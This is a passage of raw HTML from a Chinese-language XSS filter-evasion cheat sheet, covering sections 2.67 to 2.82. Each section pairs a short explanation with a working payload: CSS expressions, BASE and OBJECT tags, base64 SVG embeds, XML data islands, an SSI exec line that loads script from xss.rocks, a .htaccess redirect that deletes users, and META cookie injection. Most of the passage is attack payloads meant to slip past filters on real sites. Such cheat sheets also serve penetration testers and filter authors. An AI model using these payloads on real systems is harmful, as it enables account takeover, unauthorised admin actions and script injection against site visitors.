word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> Rnaske进行了一个快速的XSS模糊测试来发现IE和安全模式下的Netscape 8.1中任何可以在左括号和JavaScript指令间加入的额外字符。这都是十进制的但是你也可以使用十六进制来填充(以下字符可用:1-32, 34, 39, 160, 8192-8.13, 12288, 65279):</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> <span style="font-weight:700; color:rgb(0,112,192)">2.67.4. DIV表达式</span></p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 一个非常有效的对抗现实中的跨站脚本过滤器的变体是在冒号和"expression"之间添加一个换行:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <DIV STYLE="width: expression(alert('XSS'));"></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.68.    html 条件选择注释块<br style=""> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 只能在IE5.0及更高版本和IE渲染引擎模式下的Netscape 8.1生效。一些网站认为在注释中的任何内容都是安全的并且认为没有必要移除,这就允许我们添加跨站脚本攻击向量。系统会在一些内容周围尝试添加注释标签以便安全的渲染它们。如我们所见,这有时并不起作用:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <!--[if gte IE 4]></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify">  <SCRIPT>alert('XSS');</SCRIPT></p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify">  <![endif]--></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.69.    BASE标签</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 在IE和安全模式下的Netscape 8.1有效。你需要使用//来注释下个字符,这样你就不会造成JavaScript错误并且你的XSS标签可以被渲染。同样,这需要当前网站使用相对路径例如"images/image.jpg"来放置图像而不是绝对路径。如果路径以一个斜杠开头例如"/images/image.jpg"你可以从攻击向量中移除一个斜杠(只有在两个斜杠时注释才会生效):</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <BASE HREF="javascript:alert('XSS');//"></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.70.    OBJECT标签</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 如果允许使用OBJECT,你可以插入一个病毒攻击载荷来感染用户,类似于APPLET标签。链接文件实际是含有你XSS攻击代码的HTML文件:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.71.    使用EMBED标签加载含有XSS的FLASH文件</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 如果你添加了属性allowScriptAccess="never"以及allownetworking="internal"则可以减小风险(感谢Jonathan Vanasco提供的信息):</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.72.    使用EMBED SVG包含攻击向量</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 该示例只在FireFox下有效,但是比上面的攻击向量在FireFox下好,因为不需要用户安装或启用FLASH。感谢nEUrOO提供:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.73.    在FLASH中使用ActionScript混淆XSS攻击向量</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> a="get";</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> b="URL(\"";</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> c="javascript:";</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> d="alert('XSS');\")";</p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> eval(a+b+c+d);</p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.74.    CDATA混淆的XML数据岛</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这个XSS攻击只在IE和使用IE渲染模式的Netscape 8.1下有效-攻击向量由Sec Consult在审计Yahoo时发现</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML></p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.75.    使用XML数据岛生成含内嵌JavaScript的本地XML文件</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这和上面是一样的但是将来源替换为了包含跨站脚本攻击向量的本地XML文件(必须在同一服务器上):</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <XML SRC="xsstest.xml" ID=I></XML></p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.76.    XML中使用HTML+TIME</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这是Grey Magic攻击Hotmail和Yahoo的方法。这只在IE和IE渲染模式下的Netscape8.1有效并且记得需要在HTML域的BODY标签中间才有效:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> <HTML><BODY></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <?import namespace="t" implementation="#default#time2"></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> </BODY></HTML></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.77.    使用一些字符绕过".js"过滤</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 你可以将你的JavaScript文件重命名为图像来作为XSS攻击向量:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.78.    SSI(服务端脚本包含)</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这需要在服务器端允许SSI来使用XSS攻击向量。似乎不用提示这点,因为如果你可以在服务器端执行指令那一定是有更严重的问题存在:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://xss.rocks/xss.js></SCRIPT>'"--></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.79.    PHP</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 需要服务器端安装了PHP来使用XSS攻击向量。同样,如果你可以远程运行任意脚本,那会有更加严重的问题:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <? echo('<SCR)';</p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> echo('IPT>alert("XSS")</SCRIPT>'); ?></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.80.    嵌入命令的IMAGE</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 当页面受密码保护并且这个密码保护同样适用于相同域的不同页面时有效,这可以用来进行删除用户,增加用户(如果访问页面的是管理员的话),将密码发送到任意地方等等。。。这是一个较少使用当时更有价值的XSS攻击向量:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> <span style="font-weight:700; color:rgb(0,112,192)">2.80.1. 嵌入命令的IMAGE II</span></p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这更加可怕因为这不包含任何可疑标识,除了它不在你自己的域名上。这个攻击向量使用一个302或304(其他的也有效)来重定向图片到指定命令。所以一个普通的<IMG SRC="httx://badguy.com/a.jpg">对于访问图片链接的用户来说也有可能是一个攻击向量。下面是利用.htaccess(Apache)配置文件来实现攻击向量。(感谢Timo提供这部分。):</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser</p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.81.    Cookie篡改</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 尽管公认不太实用,但是还是可以发现一些允许使用META标签的情况下可用它来覆写cookie。另外的例子是当用户访问网站页面时,一些网站读取并显示存储在cookie中的用户名,而不是数据库中。当这两种场景结合时,你可以修改受害者的cookie以便将JavaScript注入到其页面中(你可以使用这个让用户登出或改变他们的用户状态,甚至可以让他们以你的账户登录):</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.82.    UTF-7编码</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); 